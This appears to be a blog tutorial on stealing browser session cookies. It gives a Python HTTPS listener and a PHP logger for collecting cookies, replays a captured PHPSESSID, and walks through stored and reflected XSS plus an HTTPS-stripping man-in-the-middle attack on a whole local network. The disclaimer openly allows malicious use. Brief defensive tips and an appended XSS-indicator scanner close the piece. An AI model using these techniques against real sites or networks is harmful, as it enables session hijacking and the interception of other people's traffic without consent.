Disclaimer: You are free to use the presented knowledge for educational purposes, with good intentions (securing web applications, penetration testing, CTFs etc.), or not. I am not responsible for anything you do.
This article will explain some of the common HTTP state interception methods.
Everything here starts with a listener.
If the target is outside your NAT, you will also need to forward the corresponding port.
You can also use a web service similar to Requestbin (its public hosting has unfortunately been discontinued).
Below is a very simple listener written in Python 3.
import http.server, ssl, sys
class S(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        with open('cookies.txt', 'a') as xss:  # append the request path and its query string
            xss.write(self.path + '\n')
        self.send_response(204)
        self.end_headers()
def run(server_class=http.server.HTTPServer, handler_class=S, port=443):
    httpd = server_class(('', port), handler_class)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)  # ssl.wrap_socket was removed in Python 3.12
    ctx.load_cert_chain(certfile=sys.argv[1])       # the original passed sys.argv, the whole list
    httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
    print('[*] Serving at ' + str(httpd.server_address))
    httpd.serve_forever()
if __name__ == "__main__":
    if len(sys.argv) != 2:  # the original check was inverted
        sys.exit("Specify cert file")
    run()
You can then connect to it and test if it works.
openssl s_client -connect localhost:443
For this article I've chosen PHP's simple built-in HTTP server, as we are not dealing with SSL traffic.
Let's create something quick in PHP.
<?php
$string = $_GET['xss'] ?? '';  // value of the ?xss= URL parameter
$handle = fopen('xss.txt', 'a');
fwrite($handle, $string . PHP_EOL); fclose($handle);
In short, it just saves the received cookie to a file.
Start the server with elevated privileges.
sudo php -S 0.0.0.0:80 -f index.php -t .
- -S 0.0.0.0:80 - Listen on all interfaces, port 80
- -f index.php - Specified file to parse
- -t . - Directory root (dot means current directory)
Basically we create a new image object whose source points to our listener at 192.168.1.101; while the browser tries to load the fake image, we capture the URL parameter containing the cookie.
First, let's test it locally from the browser's developer console; then we'll move on to injecting the script in situations without physical access to the victim's browser.
If you received the cookie, you've done everything correctly. Congratulations 😀
document.cookie = "PHPSESSID=rqc8ictmojuag6c4k464end6n4";
We can also set it in the browser's Storage tab.
If you craft requests by hand, pass the cookie manually in the HTTP request header.
Let’s move to the basic XSS topic.
The first XSS exploitation technique I will showcase is called stored XSS. We will be targeting a vulnerable input that allows us to add an unsanitized comment. The exploitation is persistent, as the payload is constantly read back from the database.
<!-- Comment contents
I encoded the payload as char codes and then used eval to run it on the body load event -->
Wow, I really like your site
- Once the user logs in and reads the comments, we get their cookie.
Another technique is called reflected XSS; this time we need the user to click on a prepared link that injects the payload through an unsanitized input.
Generally, if there is a field that loads a string from the URL and does not filter anything before rendering it, then Reflected XSS is possible.
There is a vulnerable search field on this web app; let's exploit it and send our link to the user.
// This is the same payload, but URL-encoded and with "White Dog" prepended.
The last technique I will cover in this article does not need precision to succeed.
It involves sniffing the network, downgrading HTTPS traffic to HTTP, proxying the packets and then injecting the payload in real time.
We will use a great framework made by Marcello Salvati.
sudo php -S 0.0.0.0:8000 -f index.php -t . &
- -i wlp2s0 - Use interface wlp2s0
- --spoof - spoof the packets
- --hsts - try to strip SSL
- --netmask 192.168.1.0/24 - set the network mask
- --gateway 192.168.1.1 - set the gateway
After a while we notice that every single device on the network is sending us cookies from most of the HTTP requests it makes.
- Web devs - sanitize your inputs.
- Verify that sites you own do not contain anything unexpected in their source code or database.
- Do not trust every email.
- Verify what links you click on.
- Be alarmed when your connection suddenly loses SSL (check the padlock icon in the web browser).
- Connect only to trusted networks. (Open WiFis are not trusted)
- If you detect a Man in the Middle attack in your packet captures, do not ignore the threat.
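The advice to check your own sites for unexpected content can be automated. The scanner below is an added example, not part of the original article: it peels off layered URL and HTML-entity encoding and flags the indicators this article's payloads rely on (script tags, event handlers, eval fed by char codes, document.cookie access) across a constructed sample of comment rows; the function names and SAMPLE_COMMENTS are my own.

```python
import html
import re
from urllib.parse import unquote

# Indicator patterns, compiled once; case-insensitive because browsers treat
# tag and attribute names case-insensitively.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "eval_call": re.compile(r"\beval\s*\(", re.I),
    "charcode_decode": re.compile(r"String\.fromCharCode\s*\(", re.I),
    "cookie_access": re.compile(r"document\.cookie", re.I),
}

def normalize(value: str, rounds: int = 3) -> str:
    """Peel off layered URL and HTML-entity encoding so that %3Cscript%3E or
    &lt;script&gt; still match; the round limit bounds the work per record."""
    for _ in range(rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value

def scan_record(record: str) -> list:
    """Return the names of all indicators found in one stored value."""
    text = normalize(record)
    return [name for name, pat in INDICATORS.items() if pat.search(text)]

def scan_records(records: dict) -> dict:
    """Scan a mapping of record id -> raw stored text and keep only the hits."""
    return {rid: hits for rid, raw in records.items() if (hits := scan_record(raw))}

# Constructed sample rows standing in for a dump of the comments table.
SAMPLE_COMMENTS = {
    "c1": "Wow, I really like your site",
    "c2": 'Nice post <body onload="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">',
    "c3": "White Dog %3Cscript%3Edocument.cookie%3C%2Fscript%3E",  # URL-encoded, like a reflected search term
    "c4": "Can you write about eval&lt;b&gt;uation&lt;/b&gt;?",     # harmless: entities only, no eval call
}

if __name__ == "__main__":
    for rid, hits in scan_records(SAMPLE_COMMENTS).items():
        print(f"{rid}: {', '.join(hits)}")
```

Run it against a real dump by replacing SAMPLE_COMMENTS with rows read from your database; any record that fires an indicator deserves a manual look, since the patterns are indicators, not proof.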
I wish you good luck 😎